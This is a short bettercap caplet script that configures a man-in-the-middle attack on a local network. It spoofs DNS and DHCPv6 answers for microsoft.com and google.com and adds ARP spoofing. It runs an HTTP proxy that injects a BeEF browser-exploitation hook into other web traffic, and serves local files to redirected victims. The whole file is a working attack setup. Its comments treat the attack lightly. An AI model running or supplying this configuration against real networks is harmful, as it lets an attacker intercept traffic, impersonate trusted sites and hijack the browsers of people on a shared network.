# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com
# and let's inject a beef hook into everything else ^_^
set http.proxy.script caplets/beef-inject.js

# every http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on
# just in case U.U'
arp.spoof on
# enable proxy
http.proxy on

# clear the events buffer and the screen
events.clear
clear


